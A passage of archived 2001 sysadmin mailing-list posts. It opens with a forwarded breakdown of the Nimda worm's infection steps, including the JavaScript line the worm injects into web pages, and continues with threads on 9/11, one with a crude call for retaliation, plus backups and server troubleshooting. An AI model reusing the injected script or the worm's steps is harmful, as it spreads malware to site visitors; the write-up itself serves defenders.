  virus.
  -Original Message- From: 
  [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: 
  Worm probes 
  Here's one from a thread on nanog 
  HTH, 
  Geoff 
  - Original Message - From: 
  "Jim Olsen" [EMAIL PROTECTED] To: 
  [EMAIL PROTECTED] Sent: Tuesday, September 18, 
  2001 11:03 AM Subject: Re: FW: Worm probes 
  
This is the information i've 
  collected thus far on W32.nimda:   W32.nimda is NOT a code red variant, and the people who referring 
  to it as  "Code Blue" were mistaken... 
The name it has been given 
  (at least by TruSecure) is W32.nimda.a.mm. It uses  several vulnerabilities in Windows NT 
  and 2000 server's to infect a server,  and also employ's email and web site mobile code to infect 
  Windows  9x/ME/NT/2k boxes.   During the initial infection of a 
  server, the worm does the following:  - download a file 
  named "admin.dll" via tftp from the system that is  trying to infect the target 
   - add 
  the guest account to the local administrators group and  activates the account  - makes sure c$ is 
  shared out  - copies itself to 
  c, d, and e drives  - tries to mail 
  itself to email addresses that it discovers on the  server  - creates a file 
  named readme.exe, which is used in the mobile code  inserted on the web sites 
  below  - add this string 
  to the web pages found on the server:  
  htmlscript language="JavaScript"window.open("readme.eml", 
  null,  
  "resizable=no,top=6000,left=6000")/script/html 
   - scans 
  for and infects other vulnerable IIS servers  - goes through all 
  shared directories and puts sample.nws,  
  sample.eml, desktop.eml, desktop.nws in each directory. these are eml 
   messages with copies of itself (readme.exe) autoloaded 
  by the mobile html  code mentioned above. 
   - goes 
  through all shared directories and puts riched20.dll in each  directory, which is a trogan dll 
  version of W32.nimda that is meant to  infect 
  people running notepad/wordpad in that directory.  - puts a trojan 
  mmc.exe in the winnt directory that is a copy of  
  itself in the above "readme.exe" format (win2000 only)   If a user views a web site that is 
  hosted on an infected server, the  following 
  happens:  - upon viewing an 
  infected page, the mobile code extracts to  
  readme.exe and starts in windows media player (without user 
  intervention)  - the user's 
  machine becomes infected with W32.nimda at this point  and time  - the worm starts 
  scanning for other vulnerable IIS servers  - the worm emails 
  itself to everyone on the user's address book  - goes through all 
  shared directories and puts sample.nws,  
  sample.eml, desktop.eml, desktop.nws in each directory. these are eml 
   messages with copies of itself (readme.exe) autoloaded 
  by the mobile html  code mentioned above. 
   - goes 
  through all shared directories and puts riched20.dll in each  directory, which is a trogjan dll 
  version of W32.nimda that is meant to  infect 
  people running notepad/wordpad in that directory.  - puts a 

RE: has anyone used doubletake successfully?

[John Cesta - Lists]

A great product, been using it for 4 years syncing two web servers, Web
data, ftp data mail data etc.

Never had a problem. BTW, it's overkill for us and we are switching to
Peersync to do this task. In no way does this reflect badly on DT. It is
just more that we need to replicate web data.

John Cesta

ColdFusion ASP ActiveState PERL Hosting
Includes 10 Domains - 100% Browser Based Administration
http://www.cybersmarts.net

LogFileManager - IIS LogFile Management Tool
WebPageChecker - Helps Maintain Server UpTime
http://www.serverautomationtools.com


 -Original Message-
 From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, September 13, 2001 4:31 PM
 To: NT System Admin Issues
 Subject: RE: has anyone used doubletake successfully?


 Works like a champ.  Keep in mind, DATA only - not the
 configuration of IIS.
 I think our esteemed list sponsor also uses it for their web sites.

 -Original Message-
 From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, September 13, 2001 4:26 PM
 To: NT System Admin Issues
 Subject: RE: has anyone used doubletake successfully?


 For replication of web data?
 Does it do a good job?

 -Original Message-
 From: Gordon Olson [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, September 13, 2001 12:48 PM
 To: NT System Admin Issues
 Subject: RE: has anyone used doubletake successfully?


 Yes - using it right now, web servers

 -Original Message-
 From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, September 13, 2001 12:19 PM
 To: NT System Admin Issues
 Subject: RE: has anyone used doubletake successfully?


 yes

 -Original Message-
 From: Mikelist (E-mail) [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, September 13, 2001 3:17 PM
 To: NT System Admin Issues
 Subject: has anyone used doubletake successfully?


 to replicate data and services on nt4 server and/or win2k server?

 
 
 --
 Michael D. Plotsker
 Technology Consultant
 KJ Technology Consulting, Inc.
 T. 718-575-1595
 C. 917-406-4215
 F. 212-202-5013
 [EMAIL PROTECTED]


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: NewYork Terrorist Attack

[John Cesta - Lists]

Title: RE: NewYork Terrorist Attack





  -Original Message-From: David James 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
  11, 2001 11:45 AMTo: NT System Admin IssuesSubject: RE: 
  NewYork Terrorist Attack
  I 
  don't mean to promote war, but we as a country HAVE to retaliate to 
  this...
  F00k the 3rd world countries that harbor terrorists...
  
  Why not call it WAR, that's what it 
  is21 Century WAR!!We MUST retaliate and immediatley upon locating 
  who is responsible!
  
  
-Original Message-From: Mal Sasalu 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 
10:33 AMTo: NT System Admin IssuesSubject: RE: NewYork 
Terrorist Attack



I 
watched over the television. The structures of both north and south towers 
of WTO came down with a huge blast and now they are basically a heap of 
rubble.
-Original 
Message-From: Rogers, 
Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 9:30 
AMTo: NT System Admin 
IssuesSubject: RE: NewYork 
Terrorist Attack

Could you confirm either 
more or less whether the structures are basically now grade 
level? 

-Original 
Message- 
From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 10:24 
To: NT System Admin 
Issues 
Subject: RE: NewYork Terrorist 
Attack 


Im about 40 blocks from 
the towers and we were all told we can go home but all the bridges and 
subways are closed so here i am trying to figure out a way to get to 
brooklyn. 

Roman 
Bogdanov 
Head of IT Support Jnana Technologies 
Corp. 
www.jnana.com 212-560-9151 ext. 
202 
212-560-9066 fax 

-Original 
Message- 
From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 11:24 AM 
To: NT System Admin 
Issues 
Subject: RE: NewYork Terrorist 
Attack 


Us in Jersey City, NJ 
(just across the water) were evacuated and sent home. Its going to be a long 
day for all. 

-Original 
Message- 
From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 11:26 AM 
To: NT System Admin 
Issues 
Subject: RE: NewYork Terrorist 
Attack 


and it doesn't seem to be 
over yet. 

Jeff 
-Original 
Message- 
From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 8:19 AM 
To: NT System Admin 
Issues 
Subject: RE: NewYork Terrorist 
Attack 


This is an incredibly 
tragic day. 

Probably the most tragic 
for the US since the assassination of JFK 
 - ASB  

-Original 
Message- 
From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 11:07 AM 
To: NT System Admin 
Issues 
Subject: NewYork Terrorist 
Attack 


Check out this 
link. 

http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html 
Hope out all you guys in 
the New York area are still with us.. 
Good 
luck, 

Richard 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Another Building Fell

[John Cesta - Lists]

 -Original Message-
 From: Michael Brubaker [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 11, 2001 5:34 PM
 To: NT System Admin Issues
 Subject: Another Building Fell
 
 
 A 47 story building next the WTC just fell!

Yea, we watch the news too. :)


 
   
 Michael Brubaker
 Vice President Tel: (321) 631-8073 Fax: (321) 632-8769 [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED]  
 IICwww.iictel.com http://www.iictel.com/
   
 
   International InterConnect
 297 Barnes Blvd.
   Rockledge, FL 32955



 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Server Backups

[John Cesta - Lists]

 -Original Message-
 From: Paul Armstrong [mailto:[EMAIL PROTECTED]]
 Sent: Monday, September 10, 2001 6:55 PM
 To: NT System Admin Issues
 Subject: Server Backups


 Hello All,

 I am trying to find out exactly what needs to be backed up on a server
 other than the Data. I have a client who has a small backup drive and
 there backups are exceeding the tape size. Obviously they are being
 cheap and don't want to upgrade to a bigger tape drive at the moment.
 Usually I just do full backups of all servers, which included all
 partitions or volumes on the servers. This particular client only has
 one drive (c:) which had the OS and the data that they use. If I just
 backed up the client's data it would be under the drive limit but the OS
 and other folders(program files, etc) amount to almost 2GB. Other than
 the repair folder, and the dhcp, wins,  dns folders under the system32
 folder what other folders need to be backed up for usage in case the
 server needs to be restored? The server is NT 4.0 SP6a running Exchange
 5.5 SP3!

Here is my suggestion: Tell your client that to figure this out and manage
it all will - in labor costs - exceed the cost of a capable tape drive.

John Cesta

ColdFusion ASP ActiveState PERL Hosting
Includes 10 Domains - 100% Browser Based Administration
http://www.cybersmarts.net

LogFileManager - IIS LogFile Management Tool
WebPageChecker - Helps Maintain Server UpTime
http://www.serverautomationtools.com


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: whats FSO's dll called

[John Cesta - Lists]

 -Original Message-
 From: Paul Broomfield [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 04, 2001 9:31 AM
 To: NT System Admin Issues
 Subject: RE: whats FSO's dll called


 Hi,

 Thanks for getting back to me.

 The problem we have been experiencing seems to be a little odd.
 A page that
 uses FSO seems to work fine until it gets to the point where it uses
 FSO.GetFolder(Path). Even if Path exists and is valid with correct
 permissions it causes the ASP pages to stop responding and not load - does
 even give a timeout, this then causes the rest of the site to respond
 extremely slwly and eventually die with a full server restart
 needed to
 sort it out.

 We had a problem with Virtual Memory last week and its never been the same
 since - is there anyway to reinstall FSO (I guess unreg and copy from
 another work server and re-reg).  Or does anyone know what gets affected
 when an Out of Virtual Memory message pops up?  We seemed to loose date
 formats, everything went to American dates rather than United Kingdom.



1. Did this start happening all-of-a-sudden?

2. Did this program ever work properly?

3. Does it work as a vbscript when run from the server's command line?

John Cesta

ColdFusion ASP ActiveState PERL Hosting
Includes 10 Domains - 100% Browser Based Administration
http://www.cybersmarts.net

LogFileManager - IIS LogFile Management Tool
WebPageChecker - Helps Maintain Server UpTime
http://www.serverautomationtools.com










 Thanks
 Paul

 Paul Broomfield, Network Administrator and Database Technician
 Tell Communications
 Tamar Science Park
 Derriford
 Plymouth
 Devon
 PL6 8BX

 Tel: +44 (0) 1752 764242
 Fax: +44 (0) 1752 764243

 Visit us on the web at: http://www.tell-com.com/

 -Original Message-
 From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
 Sent: 04 September 2001 14:23
 To: NT System Admin Issues
 Subject: RE: whats FSO's dll called


 The FSO is a dll called scrrun.dll It is either available or not, meaning,
 you can disable it be hacking the registry or you can enable it by
 registering the dll in the registry. That's about it.

 What is your problem with the FSO?

 John Cesta

 ColdFusion ASP ActiveState PERL Hosting
 Includes 10 Domains - 100% Browser Based Administration
 http://www.cybersmarts.net

 LogFileManager - IIS LogFile Management Tool
 WebPageChecker - Helps Maintain Server UpTime
 http://www.serverautomationtools.com


  -Original Message-
  From: Paul Broomfield [mailto:[EMAIL PROTECTED]]
  Sent: Tuesday, September 04, 2001 9:07 AM
  To: NT System Admin Issues
  Subject: whats FSO's dll called
 
 
  Hello,
 
  We are getting problems with FSO on our web servers - does anyone
  know what
  the Dll(s) are called for FSO and do they appear in either task
 manager or
  PerfMon
 
  Our servers are w2k sp2
 
  Thanks
  Pauk
 
  Paul Broomfield, Network Administrator and Database Technician
  Tell Communications
  Tamar Science Park
  Derriford
  Plymouth
  Devon
  PL6 8BX
 
  Tel: +44 (0) 1752 764242
  Fax: +44 (0) 1752 764243
 
  Visit us on the web at: http://www.tell-com.com/
 
 
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Expand Partition

[John Cesta - Lists]

Server Magic is a partition expander for NT servers.

ColdFusion ASP ActiveState PERL Hosting
Includes 10 Domains - 100% Browser Based Administration
http://www.cybersmarts.net

LogFileManager - IIS LogFile Management Tool
WebPageChecker - Helps Maintain Server UpTime
http://www.serverautomationtools.com


 -Original Message-
 From: Alexander Lattaruli Stender [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 04, 2001 1:54 PM
 To: NT System Admin Issues
 Subject: Expand Partition


 BlankI am not sure if this is going to be a cross posting but I will ask
 because one day we all will need to upgrade anyway.

 I have one NT4 SP6 server with 2 sets of mirrored hot swappable
 hard drives.
 Each set has one 9.1Gb and one 17Gb. I will need to upgrade the
 17Gb ones to
 181Gb as I need to place a 70Gb SQL data base on them. Machine is live and
 has to be like that for the maximum time possible. This big drive also
 contains software installations and file permissions are set as well.

 The idea is to break the mirror, take one drive out, place it on another
 system in parallel with the new 181Gb and  restablish the mirror.
 This will
 generate a 17Gb partition on the 181Gb HD, then I would use a partitioning
 tool to grow it to 181Gb.

 Someone told me to do a file copying and that is it. No partition growth
 necessary... I doubt it is going to work.

 Have you had any experience like this? Do you know any good partition
 expander software. (Drive Copy goes only up to 80Gb)

 Comments are welcome.

 Thank you.

 Alex


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: nt40 desktop not appearing

[John Cesta - Lists]

 -Original Message-
 From: Scot A. Pflug [mailto:[EMAIL PROTECTED]]
 Sent: Friday, August 31, 2001 12:19 PM
 To: NT System Admin Issues
 Subject: Re: nt40 desktop not appearing


 It sounds like explorer did not start, hit ctrl alt del and then
 select task list, and then run explorer.exe, or of course you
 could reboot.

I'll be darned...the explorer.exe was actually missing, not even on the
drive. Must have got trashed during the reboot. I copied if from another
server and it comes up fine.

Thanks for all the ideas!

John Cesta

ColdFusion ASP ActiveState PERL Hosting
Includes 10 Domains - 100% Browser Based Administration
http://www.cybersmarts.net

LogFileManager - IIS LogFile Management Tool
WebPageChecker - Helps Maintain Server UpTime
http://www.serverautomationtools.com


  John Cesta - Lists [EMAIL PROTECTED] 08/31/2001 12:19:16 PM 


 After I rebooted my NT4.0 SP4 development server today it
 returned only the
 the CTRl-ALT-DEL dialog box. The NT splash banner was not in the
 background.
 I logged in but only received a blank blue screen, no icons or desktop. No
 task bar etc.

 I can even hit CTRL-ALT-DEL and get the task manager dialog and that all
 works, but I cannot get access to the desktop.

 Anyone have any idea what the heck is going on? There is no virus, not
 connected to Internet or no programs have been installed.

 Thanks,

 John Cesta


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

nt40 desktop not appearing

[John Cesta - Lists]

After I rebooted my NT4.0 SP4 development server today it returned only the
the CTRl-ALT-DEL dialog box. The NT splash banner was not in the background.
I logged in but only received a blank blue screen, no icons or desktop. No
task bar etc.

I can even hit CTRL-ALT-DEL and get the task manager dialog and that all
works, but I cannot get access to the desktop.

Anyone have any idea what the heck is going on? There is no virus, not
connected to Internet or no programs have been installed.

Thanks,

John Cesta


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: nt40 desktop not appearing

[John Cesta - Lists]

 -Original Message-
 From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
 Sent: Friday, August 31, 2001 12:20 PM
 To: NT System Admin Issues
 Subject: RE: nt40 desktop not appearing
 
 
 Key word: Development Server
 Maybe the developers screwed it up. 

It's just me and only me. I...memine

John
 
 -Original Message-
 From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] 
 Sent: Friday, August 31, 2001 9:19 AM
 To: NT System Admin Issues
 Subject: nt40 desktop not appearing
 
 
 
 
 After I rebooted my NT4.0 SP4 development server today it returned only
 the the CTRl-ALT-DEL dialog box. The NT splash banner was not in the
 background. I logged in but only received a blank blue screen, no icons
 or desktop. No task bar etc.
 
 I can even hit CTRL-ALT-DEL and get the task manager dialog and that all
 works, but I cannot get access to the desktop.
 
 Anyone have any idea what the heck is going on? There is no virus, not
 connected to Internet or no programs have been installed.
 
 Thanks,
 
 John Cesta
 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm